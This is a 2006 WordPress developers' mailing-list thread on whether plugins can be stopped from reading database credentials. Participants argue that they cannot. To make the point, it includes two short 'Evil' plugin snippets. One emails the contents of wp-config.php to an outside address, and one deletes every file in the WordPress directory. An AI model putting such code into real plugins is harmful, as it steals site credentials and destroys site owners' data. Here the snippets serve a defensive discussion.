Keeping database connection info safe

classic Classic list List threaded Threaded
9 messages Options
Reply | Threaded
Open this post in threaded view
|

Keeping database connection info safe

Joseph Scott

I've been thinking about WordPress plugins and came up some issues on  
keeping database connection information safe.  In wp-config.php all  
of the details needed to connect to the MySQL database are defined()  
as constants.  This makes it very easy for the $wpdb object to do its  
thing.  But once the database connection has been established, do we  
really need to have those constants still floating around?

It would be very easy to include some malicious code in a plugin that  
would attempt to email out those details to "bad people".  So my  
first thought was to simply undefine the database connection info  
once a successful database connection has been established.  It  
doesn't look like this is possible though, according to the PHP  
constants docs (at http://us2.php.net/manual/en/ 
language.constants.php).  Once a constant has been defined it can  
never, ever be changed or undefined, hence the term constant :-)

So perhaps there should be some discussion on setting the database  
connection information in a way that can be latter undefined once the  
database connection has been established.  May be something as simple  
as an array?  Something like:

$db_info["host"] = "localhost";
$db_info["user"] = "awesome";
$db_info["password"] = "133t";
$db_info["name"] = "cool_blog";

After the database connection is done a call to unset($db_info) or  
$db_info = "" or $db_info = array() would be enough to zap that info.

I realize there is a certain amount of trust when a user activates a  
plugin and there isn't really a way to prevent a plugin from shooting  
a user in the foot, but we can take some small steps to eliminate the  
potential risks.  No this won't prevent a plugin from trashing a  
database (since they'll still have access to the database  
connection), but it could prevent sensitive data from getting out.

Comments, thoughts, ideas?

--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/



_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Dave Grijalva
I agree with this.  It could be argued that you should only install plugins
from users you trust or that you should view the source of a plugin before
installing it, but that's not really good enough.  Since the db password has
to be stored in the config file in cleartext, I think there really needs to
be a way to wipe it once the db is connected.

The only problems I see with this is that the config file can always just be
included again, or even opened and parsed by the malicious plugin.  Also, if
the connect info is removed from the memory, there would be no way to
reconnect to the db if the connection is severed, though I don't know if
there is even support for this in the wp core code.

A better way to do this with php5 is to use private member variables and a
setter function, but I don't think there is a PHP4 equivalent.  Can anybody
out there think of a PHP4 compatible way to secure that data?

-dave

On 2/24/06, Joseph Scott <[hidden email]> wrote:

>
>
> I've been thinking about WordPress plugins and came up some issues on
> keeping database connection information safe.  In wp-config.php all
> of the details needed to connect to the MySQL database are defined()
> as constants.  This makes it very easy for the $wpdb object to do its
> thing.  But once the database connection has been established, do we
> really need to have those constants still floating around?
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.  It
> doesn't look like this is possible though, according to the PHP
> constants docs (at http://us2.php.net/manual/en/
> language.constants.php).  Once a constant has been defined it can
> never, ever be changed or undefined, hence the term constant :-)
>
> So perhaps there should be some discussion on setting the database
> connection information in a way that can be latter undefined once the
> database connection has been established.  May be something as simple
> as an array?  Something like:
>
> $db_info["host"] = "localhost";
> $db_info["user"] = "awesome";
> $db_info["password"] = "133t";
> $db_info["name"] = "cool_blog";
>
> After the database connection is done a call to unset($db_info) or
> $db_info = "" or $db_info = array() would be enough to zap that info.
>
> I realize there is a certain amount of trust when a user activates a
> plugin and there isn't really a way to prevent a plugin from shooting
> a user in the foot, but we can take some small steps to eliminate the
> potential risks.  No this won't prevent a plugin from trashing a
> database (since they'll still have access to the database
> connection), but it could prevent sensitive data from getting out.
>
> Comments, thoughts, ideas?
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
>
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Sam Angove
In reply to this post by Joseph Scott
On 2/25/06, Joseph Scott <[hidden email]> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.

<?php
/*
Plugin Name: Evil
*/
wp_mail( '[hidden email]', '', file_get_contents(ABSPATH .
'wp-config.php') );
?>

Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent.  Can anybody
> out there think of a PHP4 compatible way to secure that data?

You could still read in the source file containing the setter, so
you're right back where you started.
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Joseph Scott

On Feb 24, 2006, at 4:49 PM, Sam Angove wrote:

> On 2/25/06, Joseph Scott <[hidden email]> wrote:
>>
>> It would be very easy to include some malicious code in a plugin that
>> would attempt to email out those details to "bad people".  So my
>> first thought was to simply undefine the database connection info
>> once a successful database connection has been established.
>
> <?php
> /*
> Plugin Name: Evil
> */
> wp_mail( '[hidden email]', '', file_get_contents(ABSPATH .
> 'wp-config.php') );
> ?>
>
> Dave Grijalva wrote:
>> A better way to do this with php5 is to use private member  
>> variables and a
>> setter function, but I don't think there is a PHP4 equivalent.  
>> Can anybody
>> out there think of a PHP4 compatible way to secure that data?
>
> You could still read in the source file containing the setter, so
> you're right back where you started.


You are absolutely correct.  I must admit that I hadn't though about  
re-including the wp-config.php file.  Well that bites.  Is there any  
way to really protect against this in either PHP4 or PHP5?  I'm  
inclined at this point to say no and that everyone better be scanning  
their plugins for "evil".  Has anyone put together a list of things  
that should raise the red flag when they see it in a plugin?


--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/



_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Andy Skelton
On 2/24/06, Joseph Scott <[hidden email]> wrote:
> You are absolutely correct.  I must admit that I hadn't though about
> re-including the wp-config.php file.  Well that bites.  Is there any
> way to really protect against this in either PHP4 or PHP5?  I'm
> inclined at this point to say no and that everyone better be scanning
> their plugins for "evil".

That's right. In the absence of technical know-how or trusted
referrals, one cannot trust any code. There is no list of things to
look for. You have to trace every route through the code to discover
cleverly-hidden backdoors.

There has been discussion of a plugin certification procedure but it
never went anywhere. Check the archives if you're interested in
igniting that conversation again.

Andy
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Rob Miller-4
In reply to this post by Joseph Scott
Joseph Scott wrote:

>
> You are absolutely correct.  I must admit that I hadn't though about
> re-including the wp-config.php file.  Well that bites.  Is there any
> way to really protect against this in either PHP4 or PHP5?  I'm
> inclined at this point to say no and that everyone better be scanning
> their plugins for "evil".  Has anyone put together a list of things
> that should raise the red flag when they see it in a plugin?
>
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
>
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

But then what's to stop the inevitable

<?php
/*
Plugin Name: Evil
*/

foreach(glob(ABSPATH.'/*') as $file) {
    unlink($file);
}

?>

?

There's no way of stopping malicious code from running other than
reviewing it before you run.

--
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Joseph Scott
Rob wrote:

>
> But then what's to stop the inevitable
>
> <?php
> /*
> Plugin Name: Evil
> */
>
> foreach(glob(ABSPATH.'/*') as $file) {
>    unlink($file);
> }
>
> ?>
>
> There's no way of stopping malicious code from running other than
> reviewing it before you run.


Properly set permissions should stop that from working.  The plugin
would be run as the web server user, who doesn't need write permissions
in order to run PHP code.

--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Rob Miller-4
Joseph Scott wrote:

> Rob wrote:
>
>>
>> But then what's to stop the inevitable
>>
>> <?php
>> /*
>> Plugin Name: Evil
>> */
>>
>> foreach(glob(ABSPATH.'/*') as $file) {
>>    unlink($file);
>> }
>>
>> ?>
>>
>> There's no way of stopping malicious code from running other than
>> reviewing it before you run.
>
>
> Properly set permissions should stop that from working.  The plugin
> would be run as the web server user, who doesn't need write
> permissions in order to run PHP code.
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
> _______________________________________________
> wp-hackers mailing list
> [hidden email]
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
Except Wordpress has absolutely no control over what user the web server
runs under.

--
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|

Re: Keeping database connection info safe

Jason Salaz
In reply to this post by Joseph Scott
Joseph Scott wrote:
>
> Properly set permissions should stop that from working.  The plugin
> would be run as the web server user, who doesn't need write permissions
> in order to run PHP code.

Three words:
PHP
as
CGI
(Which happens to be my preference.)
_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers